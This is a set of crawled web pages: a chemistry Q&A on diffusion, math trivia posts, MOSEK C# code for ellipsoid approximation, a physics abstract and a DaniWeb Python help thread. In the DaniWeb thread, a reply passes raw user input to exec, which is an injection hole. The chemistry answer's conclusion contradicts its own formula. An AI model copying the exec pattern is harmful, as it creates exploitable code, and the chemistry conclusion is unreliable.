] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9120688,"math_prob":0.99762595,"size":2162,"snap":"2023-14-2023-23","text_gpt3_token_len":505,"char_repetition_ratio":0.2089898,"word_repetition_ratio":0.10377359,"special_character_ratio":0.23681776,"punctuation_ratio":0.104575165,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99966323,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T05:40:40Z\",\"WARC-Record-ID\":\"<urn:uuid:4f085215-414d-468d-9ab8-97c1de099cbc>\",\"Content-Length\":\"24477\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0e62fe62-e809-4db8-b01d-94fe6deb6e15>\",\"WARC-Concurrent-To\":\"<urn:uuid:91ddf055-ef90-4ee8-bc5e-01685a74af97>\",\"WARC-IP-Address\":\"172.67.219.165\",\"WARC-Target-URI\":\"https://qsstudy.com/work-done-constant-force/\",\"WARC-Payload-Digest\":\"sha1:RMSRXCKK5YVQ5JE3KUT4ANTYOAX3OGLV\",\"WARC-Block-Digest\":\"sha1:XT27CP55WPZ6ZFVZTV7ERRBGOXS7XRWB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949573.84_warc_CC-MAIN-20230331051439-20230331081439-00217.warc.gz\"}"} |
https://chemistry.stackexchange.com/questions/91958/effect-on-rate-of-diffusion-in-addition-of-an-inert-gas | [
"# Effect on rate of diffusion in addition of an inert gas\n\nWhat will be the effect on the rate of diffusion on addition of an inert gas to the gaseous mixture?\n\nI think the rate of diffusion should increase as the addition of extra gas will increase the inside pressure. But the given answer contradicts my proposed explanation. Where am I wrong? And why is the rate of diffusion decreasing?\n\nMy question does not ask about the effect of addition of an inert gas on a reaction equilibrium.\n\n• Is this from a book? If you add that source and the exact quote, other people with a similar problem will also be able to find this question. – Gaurang Tandon Mar 9 '18 at 10:14\n\nThe inter-diffusion caused by two gasses is described by the Stefan-Maxwell equation.\n\nIf $x_1,x_2$ are the mole fractions of the two gasses, $\\bar v$, the average speed and $\\lambda$ the mean free path then\n\n$$D_{1,2}= \\frac{x_2}{2}\\bar v_1\\lambda_1+ \\frac{x_1}{2}\\bar v_2\\lambda_2$$\n\nwhere $D_{1,2}$ is the inter-diffusion coefficient. Substituting for the mean free paths does not lead to a useful result because terms that involve collision between molecules of the same kind cannot have any extra effect compared to when only one gas is present, and so these are ignored. The result is\n\n$$D_{1,2}= \\frac{1}{\\pi\\sigma_{1,2}^2(n_1+n_2)} \\left( \\frac{2k_BT}{\\pi\\mu} \\right)^{1/2}$$\n\nwhere $\\sigma_{1,2}$ is the sum of the radii of the two molecule types and $n_1, n_2$ number of molecules/m$^3$ of each, the reduced mass is $\\mu$ kg ($\\mu=m_1m_2/(m_1+m_2)$).\n\nThis equation shows that the inter-diffusion depends on the total concentration at a given temperature, a result that is close to that observed experimentally. So your intuition was correct.\n\n(ref chapter (II). E. Moelwyn-Hughes, 'Physical Chemistry')"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.83909154,"math_prob":0.997655,"size":1106,"snap":"2019-43-2019-47","text_gpt3_token_len":340,"char_repetition_ratio":0.104355715,"word_repetition_ratio":0.0,"special_character_ratio":0.30650994,"punctuation_ratio":0.095454544,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99978596,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-13T07:34:01Z\",\"WARC-Record-ID\":\"<urn:uuid:dd3c5fce-a2e6-407c-a106-449be97d2ad7>\",\"Content-Length\":\"132148\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:429f5f3c-9a84-4adf-8f6e-910f9707ce1f>\",\"WARC-Concurrent-To\":\"<urn:uuid:56acde93-556a-45f2-ba0a-1880551c6976>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/91958/effect-on-rate-of-diffusion-in-addition-of-an-inert-gas\",\"WARC-Payload-Digest\":\"sha1:2ZIINAEJ7DT6KLCP4VUCAQGVELQIFKK3\",\"WARC-Block-Digest\":\"sha1:3NDXLCKZU6XQ5G2OXJPPFPE2JPJGGDZM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496666229.84_warc_CC-MAIN-20191113063049-20191113091049-00352.warc.gz\"}"} |
https://modulomathy.com/2013/09/ | [
"# Posted in September 2013 …\n\n## #math trivia #257 solution\n\n#math trivia for #September14: #257 is a prime of the form 2^(2^n)+1. What is n? Which other day-numbers (1-365) have this form?— Burt Kaliski Jr. (@modulomathy) September 15, 2013 Answer: n = 3 gives 2^(2^n) + 1 = 2^(2^3) + 1 = 2^8 + 1 = 257. Other day-numbers of this form are 3 … Continue reading\n\n## #math trivia #256 solution\n\n#math trivia for #September13: #256 is the last 8th power <= 365. How many years of day-numbers does it take to get to the next 8th power? — Burt Kaliski Jr. (@modulomathy) September 14, 2013 The next 8th power is 38 = 6561. It takes almost 18 years of day-numbers (365 or 366 numbers per … Continue reading\n\n## #math trivia #255 solution\n\n#math trivia for #September12: #255 is the largest 8-bit number. For what n does the largest n-bit number divide 255? Vice versa? — Burt Kaliski Jr. (@modulomathy) September 13, 2013 Only n-bit numbers for n ≤ 8 can possibly divide 255, so let’s consider the largest n-bit numbers for n from 1 to 8. They … Continue reading\n\n## #math trivia #254 solution\n\n#math trivia for #September11: #254 is the product of a prime and a Mersenne prime. What are the primes? — Burt Kaliski Jr. (@modulomathy) September 11, 2013 A Mersenne prime is a prime p that has the form p = 2q-1 where q is also prime. The prime factors of 254 are 2 and 127. … Continue reading\n\n## #math trivia #180 solution\n\n#math trivia for #June28: #180 has prime factorization 2*2*3*3*5 and profile 2+2+3+3+5=15. Is there a larger number with a smaller profile? — Burt Kaliski Jr. (@modulomathy) June 29, 2012 The “profile” of a number is a term I made up for this problem (though others may have used it first). It seemed like a good … Continue reading\n\n## #math trivia #253 solution\n\n#math trivia for #September10: #253 is the product of a Sophie Germain prime and its matching safe prime. What are the primes? — Burt Kaliski Jr. (@modulomathy) September 11, 2013 A Sophie Germain prime is a prime p with the property that 2p+1 is also prime. The prime q = 2p+1 is called the matching … Continue reading\n\n## #math trivia #252 solution\n\n#math trivia for #September9: #252 is divisible by two perfect numbers. What other day-numbers (1-365) have this property? — Burt Kaliski Jr. (@modulomathy) September 9, 2013 There are two perfect numbers that are small enough to divide a day-number, 6 and 28, and they both divide 252. Because the least common multiple of 6 and … Continue reading\n\n## #math trivia #251 solution\n\n#math trivia for #September8: #251 is the largest 8-bit prime. What are the largest 2-, 3-, 4-, 5-, 6- and 7-bit primes? (Why no 1-bits?) — Burt Kaliski Jr. (@modulomathy) September 8, 2013 The largest primes of length 2 to 7 bits are 3, 7, 13, 31, 61, and 127. As it turns out, the … Continue reading\n\n## #math trivia #179 solution\n\n#math trivia for #June27: #179 can be constructed from the digits 1, 7 and 9 using four +s and two *s. How? — Burt Kaliski Jr. (@modulomathy) June 27, 2012 For simplicity, let’s start with the assumption that “from the digits” means that the only numbers input to the equation are the single digits 1, … Continue reading\n\n## #math trivia #250 solution\n\n#math trivia for #September7: #250 cents can be “changed” into dollars and quarters how many ways? How about dollars, quarters and dimes? — Burt Kaliski Jr. 
(@modulomathy) September 7, 2013 There are three ways to change 250 cents or \\$2.50 into dollars and quarters, depending on the number of dollars given: Two dollars, two quarters … Continue reading"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89232713,"math_prob":0.7419783,"size":3476,"snap":"2019-43-2019-47","text_gpt3_token_len":1049,"char_repetition_ratio":0.17050691,"word_repetition_ratio":0.08279221,"special_character_ratio":0.32652473,"punctuation_ratio":0.118309855,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9881038,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T02:42:40Z\",\"WARC-Record-ID\":\"<urn:uuid:920e42f6-fa57-454f-9390-a1322f40381f>\",\"Content-Length\":\"37969\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:534384ba-d54f-43a9-b53c-4addb0397ded>\",\"WARC-Concurrent-To\":\"<urn:uuid:1fab98e4-266f-44c0-bc62-2ad2db6c953a>\",\"WARC-IP-Address\":\"192.0.78.25\",\"WARC-Target-URI\":\"https://modulomathy.com/2013/09/\",\"WARC-Payload-Digest\":\"sha1:2AGPFXNWRB46Q4RNNTPMYXYM52C7CWEU\",\"WARC-Block-Digest\":\"sha1:AY5FXLODIINSNPAJWCZJVUILZ32ZFKF4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670643.58_warc_CC-MAIN-20191121000300-20191121024300-00360.warc.gz\"}"} |
https://docs.mosek.com/latest/dotnetfusion/case-studies-ellipsoids.html | [
"# 11.6 Inner and outer Löwner-John Ellipsoids¶\n\nIn this section we show how to compute the Löwner-John inner and outer ellipsoidal approximations of a polytope. They are defined as, respectively, the largest volume ellipsoid contained inside the polytope and the smallest volume ellipsoid containing the polytope, as seen in Fig. 11.7.",
null,
"Fig. 11.7 The inner and outer Löwner-John ellipse of a polygon.¶\n\nFor further mathematical details, such as uniqueness of the two ellipsoids, consult . Our solution is a mix of conic quadratic and semidefinite programming. Among other things, in Sec. 11.6.3 (Bound on the Determinant Root) we show how to implement bounds involving the determinant of a PSD matrix.\n\n## 11.6.1 Inner Löwner-John Ellipsoids¶\n\nSuppose we have a polytope given by an h-representation\n\n$\\mathcal{P} = \\{ x \\in \\real^n \\mid Ax \\leq b \\}$\n\nand we wish to find the inscribed ellipsoid with maximal volume. It will be convenient to parametrize the ellipsoid as an affine transformation of the standard disk:\n\n$\\mathcal{E} = \\{ x \\mid x = Cu + d,\\ u\\in\\real^n,\\ \\| u \\|_2 \\leq 1 \\}.$\n\nEvery non-degenerate ellipsoid has a parametrization such that $$C$$ is a positive definite symmetric $$n\\times n$$ matrix. Now the volume of $$\\mathcal{E}$$ is proportional to $$\\mbox{det}(C)^{1/n}$$. The condition $$\\mathcal{E}\\subseteq\\mathcal{P}$$ is equivalent to the inequality $$A(Cu+d)\\leq b$$ for all $$u$$ with $$\\|u\\|_2\\leq 1$$. After a short computation we obtain the formulation:\n\n(11.22)$\\begin{split}\\begin{array}{lll} \\maximize & t & \\\\ \\st & t \\leq \\mbox{det}(C)^{1/n}, & \\\\ & (b-Ad)_i\\geq \\|(AC)_i\\|_2, & i=1,\\ldots,m,\\\\ & C \\succeq 0, & \\end{array}\\end{split}$\n\nwhere $$X_i$$ denotes the $$i$$-th row of the matrix $$X$$. This can easily be implemented using Fusion, where the sequence of conic inequalities can be realized at once by feeding in the matrices $$b-Ad$$ and $$AC$$.\n\nListing 11.11 Fusion implementation of model (11.22). Click here to download.\n public static Tuple<double[], double[]> lownerjohn_inner(double[][] A, double[] b)\n{\nusing( Model M = new Model(\"lownerjohn_inner\"))\n{\nint m = A.Length;\nint n = A.Length;\n\n// Setup variables\nVariable t = M.Variable(\"t\", 1, Domain.GreaterThan(0.0));\nVariable C = det_rootn(M, t, n);\nVariable d = M.Variable(\"d\", n, Domain.Unbounded());\n\n// (bi - ai^T*d, C*ai) \\in Q\nfor (int i = 0; i < m; ++i)\nM.Constraint(\"qc\" + i, Expr.Vstack(Expr.Sub(b[i], Expr.Dot(A[i], d)), Expr.Mul(C, A[i])),\nDomain.InQCone().Axis(0) );\n\n// Objective: Maximize t\nM.Objective(ObjectiveSense.Maximize, t);\nM.Solve();\n\nreturn Tuple.Create(C.Level(), d.Level());\n}\n}\n\n\nThe only black box is the method det_rootn which implements the constraint $$t\\leq \\mbox{det}(C)^{1/n}$$. It will be described in Sec. 11.6.3 (Bound on the Determinant Root).\n\n## 11.6.2 Outer Löwner-John Ellipsoids¶\n\nTo compute the outer ellipsoidal approximation to a polytope, let us now start with a v-representation\n\n$\\mathcal{P} = \\mbox{conv}\\{ x_1, x_2, \\ldots , x_m \\} \\subseteq \\real^n,$\n\nof the polytope as a convex hull of a set of points. We are looking for an ellipsoid given by a quadratic inequality\n\n$\\mathcal{E} = \\{ x\\in\\real^n \\mid \\| Px-c \\|_2 \\leq 1 \\},$\n\nwhose volume is proportional to $$\\mbox{det}(P)^{-1/n}$$, so we are after maximizing $$\\mbox{det}(P)^{1/n}$$. Again, there is always such a representation with a symmetric, positive definite matrix $$P$$. 
The inclusion conditions $$x_i\in\mathcal{E}$$ translate into a straightforward problem formulation:\n\n(11.23)$\begin{split}\begin{array}{lll} \maximize & t &\\ \st & t \leq \mbox{det}(P)^{1/n}, &\\ & \|Px_i - c\|_2 \leq 1, &i=1,\ldots,m,\\ & P \succeq 0, & \end{array}\end{split}$\n\nand then directly into Fusion code:\n\nListing 11.12 Fusion implementation of model (11.23). Click here to download.\n public static Tuple<double[], double[]> lownerjohn_outer(double[,] x)\n{\nusing( Model M = new Model(\"lownerjohn_outer\") )\n{\nint m = x.GetLength(0);\nint n = x.GetLength(1);\n\n// Setup variables\nVariable t = M.Variable(\"t\", 1, Domain.GreaterThan(0.0));\nVariable P = det_rootn(M, t, n);\nVariable c = M.Variable(\"c\", Domain.Unbounded().WithShape(1,n));\n\n// (1, P*x_i - c) \in Q\nM.Constraint(\"qc\",\nExpr.Hstack(Expr.Ones(m), Expr.Sub(Expr.Mul(x,P), Expr.Repeat(c,m,0))),\nDomain.InQCone().Axis(1));\n\n// Objective: Maximize t\nM.Objective(ObjectiveSense.Maximize, t);\nM.Solve();\n\nreturn Tuple.Create(P.Level(), c.Level());\n}\n}\n\n\n## 11.6.3 Bound on the Determinant Root¶\n\nIt remains to show how to express the bounds on $$\mbox{det}(X)^{1/n}$$ for a symmetric positive definite $$n\times n$$ matrix $$X$$ using PSD and conic quadratic variables. We want to model the set\n\n(11.24)$C = \lbrace (X, t) \in \PSD^n \times \real \mid t \leq \mbox{det}(X)^{1/n} \rbrace.$\n\nA standard approach when working with the determinant of a PSD matrix is to consider a semidefinite cone\n\n(11.25)$\begin{split}\left( {\begin{array}{cc}X & Z \\ Z^T & \mbox{Diag}(Z) \\ \end{array} } \right) \succeq 0\end{split}$\n\nwhere $$Z$$ is a matrix of additional variables and where we intuitively identify $$\mbox{Diag}(Z)=\{\lambda_1,\ldots,\lambda_n\}$$ with the eigenvalues of $$X$$. With this in mind, we are left with expressing the constraint\n\n(11.26)$t \leq (\lambda_1\cdot\ldots\cdot\lambda_n)^{1/n}.$\n\nThis is easy to implement recursively using rotated quadratic cones when $$n$$ is a power of $$2$$. In general it is convenient to express (11.26) as a composition of power cones, see the Modeling Cookbook.\n\nListing 11.13 Approaching the determinant, see (11.25). Click here to download.\n public static Variable det_rootn(Model M, Variable t, int n)\n{\n// Setup variables\nVariable Y = M.Variable(Domain.InPSDCone(2 * n));\n\nVariable X = Y.Slice(new int[]{0, 0}, new int[]{n, n});\nVariable Z = Y.Slice(new int[]{0, n}, new int[]{n, 2 * n});\nVariable DZ = Y.Slice(new int[]{n, n}, new int[]{2 * n, 2 * n});\n\n// Z is lower-triangular\nint[,] low_tri = new int[n*(n-1)/2,2];\nint k = 0;\nfor(int i = 0; i < n; i++)\nfor(int j = i+1; j < n; j++)\n{ low_tri[k,0] = i; low_tri[k,1] = j; ++k; }\nM.Constraint(Z.Pick(low_tri), Domain.EqualsTo(0.0));\n// DZ = Diag(Z)\nM.Constraint(Expr.Sub(DZ, Expr.MulElm(Z, Matrix.Eye(n))), Domain.EqualsTo(0.0));\n\n// t^n <= (Z11*Z22*...*Znn)\ngeometric_mean(M, DZ.Diag(), t);\n\n// Return an n x n PSD variable which satisfies t <= det(X)^(1/n)\nreturn X;\n}\n\nListing 11.14 Bounding the geometric mean, see (11.26). Click here to download.\n public static void geometric_mean(Model M, Variable x, Variable t)\n{\nint n = (int)x.GetSize();\nif (n==1)\nM.Constraint(Expr.Sub(t, x), Domain.LessThan(0.0));\nelse\n{\nVariable t2 = M.Variable();\nM.Constraint(Var.Hstack(t2, x.Index(n-1), t), Domain.InPPowerCone(1-1.0/n));\ngeometric_mean(M, x.Slice(0,n-1), t2);\n}\n}"
] | [
null,
"https://docs.mosek.com/latest/dotnetfusion/_images/ellipses_polygon.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.67290497,"math_prob":0.99983424,"size":5408,"snap":"2022-27-2022-33","text_gpt3_token_len":1593,"char_repetition_ratio":0.103256844,"word_repetition_ratio":0.047493402,"special_character_ratio":0.30991125,"punctuation_ratio":0.20307167,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99996305,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-28T02:45:49Z\",\"WARC-Record-ID\":\"<urn:uuid:dc2195b9-ddcf-4d33-97ea-5eea7b4ad588>\",\"Content-Length\":\"41571\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:322f48b4-c4df-4f4e-8064-c9a084b28106>\",\"WARC-Concurrent-To\":\"<urn:uuid:f41454b4-eed7-43d6-a4aa-ff45a1b26c9c>\",\"WARC-IP-Address\":\"18.67.76.122\",\"WARC-Target-URI\":\"https://docs.mosek.com/latest/dotnetfusion/case-studies-ellipsoids.html\",\"WARC-Payload-Digest\":\"sha1:BC6BCO6LT75VHO3MZK52N4BYMEYKDJ7G\",\"WARC-Block-Digest\":\"sha1:5O2IQKXF5JUD33LD3VEKU45FH7HTZ5LA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103347800.25_warc_CC-MAIN-20220628020322-20220628050322-00477.warc.gz\"}"} |
https://hal.archives-ouvertes.fr/hal-01963626 | [
"Families of Solutions of Order 5 to the Johnson Equation Depending on 8 Parameters\n\nAbstract : We give different representations of the solutions of the Johnson equation with parameters. First, an expression in terms of Fredholm determinants is given; we give also a representation of the solutions written as a quotient of wronskians of order 2N. These solutions of order N depend on 2N − 1 parameters. When one of these parameters tends to zero, we obtain N order rational solutions expressed as a quotient of two polynomials of degree 2N (N + 1) in x, t and 4N (N + 1) in y depending on 2N − 2 parameters. Here, we explicitly construct the expressions of the rational solutions of order 5 depending on 8 real parameters and we study the patterns of their modulus in the plane (x, y) and their evolution according to time and parameters $a_i$ and $b_i$ for 1 ≤ i ≤ 4.\nKeywords :\nDocument type :\nJournal articles\nComplete list of metadatas\n\nhttps://hal.archives-ouvertes.fr/hal-01963626\nContributor : Imb - Université de Bourgogne <>\nSubmitted on : Friday, December 21, 2018 - 2:21:00 PM\nLast modification on : Sunday, December 23, 2018 - 1:07:41 AM\n\nCitation\n\nPierre Gaillard. Families of Solutions of Order 5 to the Johnson Equation Depending on 8 Parameters. New Horizons in Mathematical Physics, 2018, 2 (4), ⟨10.22606/nhmp.2018.24001⟩. ⟨hal-01963626⟩\n\nRecord views"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.885005,"math_prob":0.8784659,"size":785,"snap":"2019-43-2019-47","text_gpt3_token_len":191,"char_repetition_ratio":0.17925736,"word_repetition_ratio":0.0,"special_character_ratio":0.23694268,"punctuation_ratio":0.08053691,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96987146,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T13:10:54Z\",\"WARC-Record-ID\":\"<urn:uuid:2cfcb9ae-5c5d-4248-acc9-8d93b8bdf845>\",\"Content-Length\":\"34370\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b306d4fc-f4cc-4d46-a1b4-29f9ff5c2560>\",\"WARC-Concurrent-To\":\"<urn:uuid:12b0cfc2-9ebf-4543-8c69-a0432a05e375>\",\"WARC-IP-Address\":\"193.48.96.10\",\"WARC-Target-URI\":\"https://hal.archives-ouvertes.fr/hal-01963626\",\"WARC-Payload-Digest\":\"sha1:ZHOSSNKISE45CHS3MSB53LQVIJCIJTC6\",\"WARC-Block-Digest\":\"sha1:N3UPVQZ6LDJIXDEHFSQFOPAS2O3W7GSJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986675316.51_warc_CC-MAIN-20191017122657-20191017150157-00410.warc.gz\"}"} |
https://www.daniweb.com/programming/software-development/threads/460170/how-to-use-values-from-one-function-to-another-function | [
"dear list,\nwhat i have to do is, i have perform some mathmatical operation in one function and using its results as input into another function, here is my code of what i had done till now :\n\n``````import math\ndef Math(x1,y1):\na = x1+y1\nb = x1-y1\nc = x1*y1\nd = x1/y1\nprint \"subtraction is:\", b\nprint \"multiplication is:\", c\nprint \"division is: \", d\nprint \"square is:\", e\nprint \"square root is\", f\n\nx1 = 0\nx = raw_input(\"enter first number: \")\nwhile not (x.isdigit()):\nx = raw_input(\"enter a valid number: \")\nx1 = int(x)\n\ny1 = 0\ny = raw_input(\"enter second number: \")\nwhile not (y.isdigit()):\ny = raw_input(\"enter a valid number: \")\ny1 = int(y)\n\nMath(x1,y1)\n\ndef Manipulator():\na1 = raw_input(\"choose the first number among a, b, c, d: \")\na2 = raw_input(\"choose the second number among a, b, c, d: \")\nif a1 =='a':\n#here i have to assign the value of a from function Math() to a1\n``````\n\nand in the similar way if user choose 'c' as second number then i have to assign the value of c from Math() to a2,\ni am unable to do this, i dont know how to call a value from one function to another function, hope you understand what i am trying to ask.\n\n## All 7 Replies\n\nUse function with parameters and return statement\n\nWhoa, whoa whoa, you'll have to redesign it.\nFirst, rename your vars, I haven't, but you should.\nSecond, have `Math` return, then print, I've done this for you\nThird, lowecase your vars, that's style.\n\n``````import math\ndef Math(x1,y1):\na = x1+y1\nb = x1-y1\nc = x1*y1\nd = x1/y1\nreturn (a,b,c,d)\nx1 = 0\nx = raw_input(\"enter first number: \")\nwhile not (x.isdigit()):\nx = raw_input(\"enter a valid number: \")\nx1 = int(x)\ny1 = 0\ny = raw_input(\"enter second number: \")\nwhile not (y.isdigit()):\ny = raw_input(\"enter a valid number: \")\ny1 = int(y)\na,b,c,d = Math(x1,y1) #unpacking of vars\nprint \"subtraction is:\", b\nprint \"multiplication is:\", c\nprint \"division is: \", d\nprint \"square is:\", e\nprint \"square root is\", f\ndef Manipulator():\na1 = raw_input(\"choose the first number among a, b, c, d: \") #got to rename\na2 = raw_input(\"choose the second number among a, b, c, d: \")\nexec(\"a1=\"+a1) #fancy shmancy no ifs\nexec(\"a2=\"+a2)\n``````\n\nSquare and square root of what?\n\ni just forget to make it comment, it was nothing just bymistake :(\n\nthis is how i come to complete what i was trying to do, i know this is not the right way to do, but i have no one whom i ask so i am asking you guys please mention my mistakes so that i can again put my effort to make it proper, my code is:\n\n``````import math\n\ndef Math(x1,y1):\na = x1+y1\nb = x1-y1\nc = x1*y1\nd = x1/y1\nwhile True:\ne1 = raw_input(\"in Math() which number you want for square x or y: \")\nif e1 == 'x':\ne = x1**2\nbreak\nelif e1 == 'y':\ne = y1**2\nbreak\nelse:\ne1 = raw_input(\"please enter the valid entry x or y :\")\nwhile True:\nf1 = raw_input(\"in Math() which number you want for square root x or y: \")\nif f1 == 'x':\nf = math.sqrt(x1)\nbreak\nelif f1 == 'y':\nf = math.sqrt(y1)\nbreak\nelse:\nf1 = raw_input(\"please enter the valid entry x or y :\")\nreturn (a,b,c,d,e,f)\n\nx1 = 0\nx = raw_input(\"enter first number for Math(): \")\nwhile not (x.isdigit()):\nx = raw_input(\"enter a valid number for Math: \")\nx1 = int(x)\ny1 = 0\ny = raw_input(\"enter second number: \")\nwhile not (y.isdigit()):\ny = raw_input(\"enter a valid number: \")\ny1 = int(y)\na,b,c,d,e,f = Math(x1,y1) #unpacking of vars\n\ndef Manipulator():\nwhile True:\na1 = 
raw_input(\"For Manipulator() choose the first number among a,b,c,d,e,f: \")\nif a1 == 'a':\nn1 = int(a)\nbreak\nelif a1 == 'b':\nn1 = int(b)\nbreak\nelif a1 == 'c':\nn1 = int(c)\nbreak\nelif a1 == 'd':\nn1 = int(d)\nbreak\nelif a1 == 'e':\nn1 = int(e)\nbreak\nelif a1 == 'f':\nn1 = int(f)\nbreak\nelse:\na1 = raw_input(\"For Manipulator() choose the fir number among a,b,c,d,e,f: \")\nwhile True:\na2 = raw_input(\"For Manipulator() choose the second number among a,b,c,d,e,f: \")\nif a2 == 'a':\nn2 = int(a)\nbreak\nelif a2 == 'b':\nn2 = int(b)\nbreak\nelif a2 == 'c':\nn2 = int(c)\nbreak\nelif a2 == 'd':\nn2 = int(d)\nbreak\nelif a2 == 'e':\nn2 = int(e)\nbreak\nelif a2 == 'f':\nn2 = int(f)\nbreak\nelse:\na2 = raw_input(\"For Manipulator() choose the sec number among a,b,c,d,e,f: \")\n\nsub = n1-n2\nmul = n1*n2\ndiv = n1/n2\nwhile True:\nsq1 = raw_input(\"In Manipulator() which number you want for square i or j: \")\nif sq1 == 'i':\nsq = n1**2\nbreak\nelif sq1 == 'j':\nsq = n2**2\nbreak\nelse:\nsq1 = raw_input(\"please enter the valid entry i or j :\")\nwhile True:\nsqt1 = raw_input(\"In Manipulator() which number you want for square root i or j: \")\nif sqt1 == 'i':\nsqt = math.sqrt(n1)\nbreak\nelif sqt1 == 'j':\nsqt = math.sqrt(n2)\nbreak\nelse:\nsqt1 = raw_input(\"please enter the valid entry i or j :\")\n\nprint \"subtraction for Manipulator() is: \",sub\nprint \"multiplication for Manipulator() is: \",mul\nprint \"division for Manipulator() is: \",div\nprint \"square for Manipulator() is:\", sq\nprint \"square root for Manipulator() is\", sqt\n\nManipulator()\n\nprint \"\\n additin for Math() is: \", a\nprint \"subtraction for Math() is:\", b\nprint \"multiplication for Math() is:\", c\nprint \"division for Math() is: \", d\nprint \"square for Math() is:\", e\nprint \"square root for Math() is\", f\n\n#and here is the output:\n\nenter first number for Math(): 3\nenter second number: 4\nin Math() which number you want for square x or y: x\nin Math() which number you want for square root x or y: y\nFor Manipulator() choose the first number among a,b,c,d,e,f: d\nFor Manipulator() choose the second number among a,b,c,d,e,f: c\nIn Manipulator() which number you want for square i or j: i\nIn Manipulator() which number you want for square root i or j: j\n\nsubtraction for Manipulator() is: -12\nmultiplication for Manipulator() is: 0\ndivision for Manipulator() is: 0\nsquare for Manipulator() is: 0\nsquare root for Manipulator() is 3.46410161514\n\nsubtraction for Math() is: -1\nmultiplication for Math() is: 12\ndivision for Math() is: 0\nsquare for Math() is: 9\nsquare root for Math() is 2.0\n``````\n\nthis program will give error if i enter 0 for y, and the error is :\nZeroDivisionError: integer division or modulo by zero\ni am unable to found any solution, please suggest some appropriate way to resolve this problem.\n\nWhen you try to divide by zero ...\n\n``````x = 2\ny = 0\nprint(x/y)\n\n''' result ...\nTraceback (most recent call last):\nFile \"Untitled\", line 3\nprint(x/y)\nZeroDivisionError: division by zero\n'''\n``````\n\nYou could protect yourself this way ...\n\n``````x = 2\ny = 0\nif y != 0:\nprint(x/y)\nelse:\nprint(\"Division by zero error\")\n``````\nBe a part of the DaniWeb community\n\nWe're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8110333,"math_prob":0.9985692,"size":1169,"snap":"2023-40-2023-50","text_gpt3_token_len":349,"char_repetition_ratio":0.13733906,"word_repetition_ratio":0.07174888,"special_character_ratio":0.32420874,"punctuation_ratio":0.15589353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998927,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T19:56:27Z\",\"WARC-Record-ID\":\"<urn:uuid:1c36ce00-0c69-434b-b2d2-fffd457f0f4d>\",\"Content-Length\":\"100164\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b513224e-7e32-487e-9ea2-b8e183691486>\",\"WARC-Concurrent-To\":\"<urn:uuid:61393456-d45e-419a-a9e8-40fc697ccef5>\",\"WARC-IP-Address\":\"172.66.40.216\",\"WARC-Target-URI\":\"https://www.daniweb.com/programming/software-development/threads/460170/how-to-use-values-from-one-function-to-another-function\",\"WARC-Payload-Digest\":\"sha1:QHI3NYQQXGARYBVLEOEYHRB6S3ZFSVJM\",\"WARC-Block-Digest\":\"sha1:YXW7WQS6NDCP35CKNXRNQGXBSJNUFMAY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679102637.84_warc_CC-MAIN-20231210190744-20231210220744-00517.warc.gz\"}"} |
https://www.4guysfromrolla.com/articles/111809-1.aspx | [
"When you think ASP, think...",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Recent Articles",
null,
"All Articles ASP.NET Articles ASPFAQs.com Related Web Technologies User Tips! Coding Tips Search",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
